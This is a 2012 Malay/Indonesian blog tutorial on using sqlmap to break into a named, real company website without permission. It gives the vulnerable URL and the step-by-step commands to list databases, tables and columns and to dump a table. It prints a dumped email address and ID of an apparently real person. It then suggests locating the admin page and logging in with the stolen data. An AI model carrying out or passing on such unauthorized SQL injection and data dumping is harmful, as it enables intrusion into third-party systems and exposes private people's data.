Wednesday, 18 January 2012

Pentest/Hack Website Dengan SqlMap

Note : Tuto ini untuk pengguna Windows.Tapi untuk pengguna Linux Stepnya sama sahaja.


SqlMap ni lebih kurang SQLi tapi menggunakan tool SQLMap yang ditulis/buat dalam bahasa Python untuk melakukan serangan SQL injection secara automatik(sama fungsi macam HAVIJ.tapi melibatkan coding2.).


Ok dah faham??jom mula......



Pertama cari target dengan dork sql inject di google

Penjelasan tentang Sqlmap

SQL: Map,semua praktisi hacking pasti mengenal tool ini,salah satu tool untuk melakukan dump sebuah database website yang bermasalah dengan SQL Injection,disini saya coba berbagi pengetahuan tentang menggunakan SQL Map ini,bukan saya bermaksud menggurui atau apa,karena saya pun hanyalah seorang yang tidak mempunyai skill lebih,masih dibawah

rata-rata,akan tetapi tidak ada salahnya pengetahuan saya yang sedikit ini saya share. Disini saya melakukan percobaan penetrasi langsung ke sebuah web,bukan localhosts,agar tidak dikira mengada-ada,web yang jadi "korban" test ini adalah sebuah web yang menawarkan jasa design website secara profesional,sungguh gak ada maksud meremehkan atau pamer,just info saja.Web yang saya maksud adalah

www.greatgulfhomes.com dimana web tersebut memilki vuln yang bisa kita explore menggunakan tehnik SQL Injection,ok langsung aja...

Pertama,pastikan komputer korang sekalian telah di-install Python versi berapa saja,lalu siapkan tool SQLMAP, Silahkan Cari Di Google,banyak berserakan Di Google :D

Download (Windows User) :
Phyton : http://www.python.org/download/
Sqlmap : http://sqlmap.sourceforge.net/


www.greatgulfhomes.com/neighbourhood-contact.php?id=38 dimana setelah saya tambahin ' di akhir URL,ditemukan pesan eror ala SQL,langsung aja deh kita buka sqlmap nya menggunakan CMD dengan perintah


C:\Python27>python sqlmap.py -u www.greatgulfhomes.com/neighbourhood-contact.php?id=38 --dbs



nih SS waktu awal Scan
Yuhu Nama DataBase Nya keliatan

yes ,databasenya dah ketemu yaitu "greatgulfhomes" sekarang kita ketikkan perintah

C:Python27>python sqlmap.py -u www.greatgulfhomes.com/neighbourhood-contact.php?id=38 -D greatgulfhomes --tables




perintah ini untuk mencari tabel dalam database yang udah kita temukan tadi....

,perintah ini kita gunakan untuk mengetahui nama databasenya...

Nih SS waktu mencari nama Data Base nya
wow..ternyata ada 312 tabel didalamnya,dan yang kita butuhkan ada disana,yaitu tabel tickets sebab ini real buat belajar :D ,maka sekarang saatnya kita ketikkan perintah
C:Python27>python sqlmap.py -u www.greatgulfhomes.com/neighbourhood-contact.php?id=38 -D greatgulfhomes -T tickets --columns


perintah ini untuk melihat colom apa saja yang ada di tabel tickets..

nih SS waktu Scan Table Tickets
wew udah keliatan tuh email , id , dan semua nya keliatan

saatnya kita liat isinya dengan perintah

C:Python27>python sqlmap.py -u www.greatgulfhomes.com/neighbourhood-contact.php?id=38 -D greatgulfhomes -T tickets --dump


perintah tersebut gunanya untuk men dump isi tabel tickets tadi...

nih SS waktu Dump Is tabel Tickets tadi,..
tara ss diatas adalah hasil dari dump kita

kita temukan isinya yaitu:
###################
email : d.lindsay@rogers.com
ID : 282321
###################

SQLMAP juga dilengkapi fasilitas untuk meng-crack password yang ditemukan,mengandalkan serangan dictionary attack,kita bisa memilih "y" untuk melakukan cracking atau "n" untuk tidak melakukan sesi cracking.Karena passwordnya tidak ter-enkripsi maka saya pilih opsi "n"

sampai disini tergantung kita,bila mau diteruskan maka kita tinggal mencari login adminnya, banyak cara kok,misal menggunakan adminfinder.py.havij,dll.lalu login dengan data yang udah kita dapatkan tadi.



Pentest menggunakan


1. python 2.7.2


2. Active python


3. sqlmap.py


4. Windows xp


5. kopi dan rokok

kalau ada salah atau salah tulis mohon di maafkan maklum newbie baru belajar :belajar

2 comments:

  1. kak,, permisi tanya,, kalo saya sudah instal semua yang diperlukan,, terus buka yang mana ya? python.exe? atau apa kak? mohon pencerahan Kak,,, Terima Kasih..

    ReplyDelete
  2. cuba ikut tuto itu secara betul,mungkin kamu ade miss step.

    ReplyDelete

Updates Via E-Mail

Labels

007 Legends (1) 007 Legends repack (1) 007 Legends-Black Box (1) 007 Legends-Black Box repack (1) 2K Games (1) 2K Marin (1) Action (8) Action RPG (5) Activision Blizzard (3) Alan Wake American Nightmare (1) Alan Wake American Nightmare-Black Box (1) ANARCHY (5) Antara AES dan pemandu kereta perasan bijak (1) antivirus (6) ARTIKEL (90) Bethesda Softworks (2) Binary Domain (2) BioShock 2 (1) BioWare Corporation (1) bitComposer Games (1) Bugbear Entertainment (1) Call of Duty: Modern Warfare 3 (1) Call of Duty: Modern Warfare 3-Black Box (1) CARDING (3) CD Projekt Red Studio (1) CERITA (7) CRACKER (18) Crysis 2 (1) Crytek Studios (1) Dark Souls: Prepare to Die Edition (1) Dark Souls: Prepare to Die Edition-Black Box (1) Darksiders (1) Darksiders II (1) Deface (1) Devil's Details (2) Digital Extremes (1) Doom 3:BFG Edition (1) Doom 3:BFG Edition-Black Box (1) EA Sports (1) Electronic Arts Inc. (4) ENGLISH MOVIE (29) Eurocom Entertainment Software (1) event (1) Exploit (76) FABLE III (1) Facebook Game Hack (1) FIFA 13 (1) FIFA 13-Black Box (1) Flashing (1) Flying Wild Hog (1) From Dust (1) From Dust-Black Box (1) From Software (1) gba games (1) Global Ops: Commando Libya (1) Global Ops: Commando Libya-Black Box (1) GORE (1) Hard Reset (1) Hard Reset-Black Box (1) HIJACK (2) History (3) id Software (1) iklan. (4) Infinity Ward (1) INFO (35) iPhone Jailbreak (9) ISU SEMASA (33) JOB (1) JOOMLA (1) KILLUMINATI (7) Konami (1) Lain-Lain Trick (1) LionHead Studios (1) MAKE MONEY (1) MALAY MOVIE (15) Mass Effect 2 (1) Max Payne 3 (1) Max Payne 3-Black Box (1) Maxis (1) Microsoft Game Studios (1) misteri (4) MOBILE (1) MUJAHID (27) music album mp3 (20) n-gage (1) Namco Bandai Games (3) NDS (1) Notepad Trick (1) OS (5) OTHER MOVIE LANGUES (8) PC GAME (141) photo (5) political (2) Pro Evolution Soccer 2013 (1) Pro Evolution Soccer 2013-Black Box (1) Prototype 2 (1) Prototype 2-Black Box (1) PS VITA (4) PS3 GAME (32) PSN GAME (6) PSP (7) PSPGAMES (4) puisi (1) putlocker games (5) Racing (1) Radical Entertainment (1) religion (12) Remedy Entertainment (1) repack game (1) REVEAL (32) Ridge Racer Unbounded-Black Box (1) Rockstar Games (1) S60v2 (1) Samsung U1000 (1) SEGA (2) SEO (2) Shooter (2) Shooting (2) Soalan bocor SPM 2012 ada di sini (1) Soft Skills Guide (1) software (31) Spectral Games (1) Sport (2) Strategy (1) SYSTEME (3) The Darkness II (1) The Darkness II-Black Box (1) The Elder Scrolls V: Skyrim (1) The Elder Scrolls V: Skyrim-Black Box (1) The Sims 3 (1) The Sims 3 Complete (1) The Sims 3 Complete-Black Box (1) The Witcher 2: Assassins of Kings (1) THQ Inc (2) tips (1) TOKOH (1) tool (2) Tutorial (30) TWEAK (6) Ubisoft Studios (1) UNDERGROUND (4) video movie (1) video music (1) Vigil Games (2) Website Hack (1) wii (2) XBOX360 (7) xboxone (1)

Total Pageviews

Blog Archive

LIST